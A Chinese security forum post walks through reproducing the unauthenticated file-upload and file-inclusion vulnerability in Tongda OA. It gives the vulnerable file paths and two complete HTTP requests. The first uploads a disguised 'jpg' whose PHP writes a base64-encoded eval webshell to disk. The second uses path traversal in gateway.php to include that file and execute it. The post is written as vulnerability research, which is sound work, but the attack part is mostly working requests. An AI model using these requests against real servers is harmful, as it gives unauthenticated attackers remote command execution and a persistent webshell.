设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 通达OA文件上传&文件包含漏洞解析
返回列表 发新帖
查看: 4888|回复: 0

通达OA文件上传&文件包含漏洞解析

[复制链接]
pukr

46

主题

165

帖子

731

积分

高级会员

Rank: 4

积分
731
发表于 2020-5-11 14:57:45 | 显示全部楼层 |阅读模式
通达OA文件上传&文件包含漏洞解析




通达OA是由北京通达信科科技有限公司开发的一款办公系统,近日通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。
攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。


搭建本地环境
通达OA下载:
链接:https://pan.baidu.com/s/1QFAoLxj9pD1bnnq3f4I8lg
提取码:ousi

包含漏洞的两个文件:
文件上传:webroot\ispirit\im\upload.php
文件包含:webroot\ispirit\interface\gateway.php



漏洞复现
在没有登录的情况下上传文件
我们直接访问
http://localhost//ispirit/im/upload.php
提示:-ERR 用户未登陆
ok,我们在burp中构造数据包

  1. POST /ispirit/im/upload.php HTTP/1.1
  2. Host: 192.168.174.159:80
  3. Content-Length: 602
  4. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
  6. Accept-Encoding: gzip, deflate
  7. Accept-Language: zh-CN,zh;q=0.9
  8. Connection: close

  10. ------WebKitFormBoundaryBwVAwV3O4sifyhr3
  11. Content-Disposition: form-data; name="UPLOAD_MODE"

  13. 2
  14. ------WebKitFormBoundaryBwVAwV3O4sifyhr3
  15. Content-Disposition: form-data; name="P"


  18. ------WebKitFormBoundaryBwVAwV3O4sifyhr3
  19. Content-Disposition: form-data; name="DEST_UID"

  21. 1
  22. ------WebKitFormBoundaryBwVAwV3O4sifyhr3
  23. Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
  24. Content-Type: image/jpeg

  26. <?php
  27. $fp = fopen('bbskali.php', 'w');
  28. $a = base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==");
  29. fwrite($fp, $a);
  30. fclose($fp);
  31. ?>
  32. ------WebKitFormBoundaryBwVAwV3O4sifyhr3--
复制代码



这里我构造了一个名为bbskali.php的图片一句话木马。但是上传之后格式为jpg格式。



如上图,我们成功上传图片。位置为2005/339702047.jpg

通达OA默认上传位置:myoa/attach/im则上面的完整路劲为:myoa/attach/im/2005/339702047.jpg





通过文件包含解析出一句话

  1. POST /ispirit/interface/gateway.php HTTP/1.1

  3. Host: 192.168.123.209

  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0

  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

  9. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

  11. Accept-Encoding: gzip, deflate

  13. Connection: close

  15. Content-Type: application/x-www-form-urlencoded

  17. Content-Length: 59

  19. json={"url":"/general/../../attach/im/2005/339702047.jpg"}
复制代码



解析为php一句话









本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 23:36 , Processed in 0.017053 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表